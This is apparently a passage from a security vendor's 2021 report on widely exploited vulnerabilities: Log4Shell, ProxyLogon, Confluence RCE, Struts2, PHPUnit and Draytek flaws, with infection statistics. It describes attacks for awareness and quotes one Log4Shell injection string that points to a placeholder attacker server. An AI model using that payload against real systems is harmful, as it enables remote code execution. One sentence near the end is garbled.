High Profile Global Vulnerabilities

The following list of top vulnerabilities is based on data collected by the Check Point Intrusion Prevention System (IPS) sensor net and details some of the most popular and interesting attack techniques and exploits observed by Check Point researchers in 2021.

‘Log4Shell’ Apache Log4j -
Remote Code Execution (CVE-2021-44228)

Apache Log4j is an open-source Java-based logging package provided by the Apache Software Foundation, as part of the Apache Logging Services. It is the most popular Java logging library, used by millions of Java-based applications worldwide to record activities such as routine system operations and error messages and to send diagnostics to system admins. On December 9, the Apache Foundation released an emergency Log4j version to address a critical flaw in the logging framework. This flaw enables threat actors to compromise a machine by sending it a simple string such as '${jndi:ldap://attacker_server/path}' as part of the HTTP request, User-Agent or any other input likely being logged by the server using Log4j. By controlling the messages logged via the logging package, arbitrary code could be executed from a remote server. Called ‘Log4Shell’, the vulnerability took the security community by storm due to its far-reaching effects on millions of companies, including Cisco, Twitter, Cloudflare, Tesla, Amazon and Apple, that use Log4j. Widespread exploitation of the flaw was observed almost immediately, both by low skilled attackers to distribute ryptominers, as well as by state sponsored APT groups, to gain access to corporate networks. According to Check Point Research approximately 48.3% of organizations were affected by exploitation attempts of the Log4Shell Vulnerability in 2021.

BACK TO TOP

“ProxyLogon” Microsoft Exchange Server - Authentication Bypass (CVE-2021-26855)

ProxyLogon is the name given by researchers from DEVCORE to an authentication bypass vulnerability (CVE-2021-26855) first discovered and reported in late 2020. When combined with other vulnerabilities (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), this infection chain can lead to remote code execution on any unpatched mainstream Exchange Server. ProxyLogon has been exploited in the wild by several APT groups. In August, Earth Baku launched a campaign in the Indo-Pacific region using SQL injection and exploiting ProxyLogon as entry vectors. In September, the FamousSparrow cyberespionage group exploited the flaw as well as backdoor SparrowDoor on hotel chains, governments, private businesses and various other sectors worldwide. Another threat group, SquirrelWaffle, was seen hacking Microsoft Exchange servers with ProxyShell and ProxyLogon to spread malware through malicious emails.

BACK TO TOP

Atlassian Confluence -
Remote Code Execution (CVE-2021-26084)

This critical Remote Code Execution in Atlassian Confluence Server or Confluence Data Center flaw, made public in August 2021, is derived from the Object Graph Navigation Language. It can be exploited without authentication, allowing a remote attacker to execute arbitrary code on the affected system. Atlassian released patches for the affected enterprises and several Proof of Concept exploits were published. Threat actors subsequently scanned for the vulnerability with the aim of installing cryptominers. In September, the z0Miner cryptojacker attempted to conduct mining operations on vulnerable machines. In October, the Atom Silo ransomware operator was observed exploiting unpatched computers to launch ransomware attacks.

BACK TO TOP

Many vulnerabilities discovered in 2017 maintained a strong presence throughout 2021. This is mostly due to popular flaws like the Apache Struts2 Remote Code Execution (CVE-2017-5638), which is incorporated into the Mirai botnet, or the PHPUnit remote code execution (CVE-2017-9841), often used to exploit vulnerable WordPress plugins.

The 2020 vulnerabilities remained prominent, leveraged in 11% of attacks. Among the most significant was the Draytek Vigor series buffer overflow vulnerabilities (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828), which had a 41% share of global impact on organizations. These vulnerabilities could be leveraged to run arbitrary code on vulnerable Draytek routers, using a specially crafted remote HTTP request.

Percentage of attacks leveraging vulnerabilities by disclosure year in 2021

Hackers from the middle of the year, corresponding with a slight decrease in the use of CVEs from 2017.

Percentage of Attacks leveraging vulnerabilities by disclosure year per month

BACK TO TOP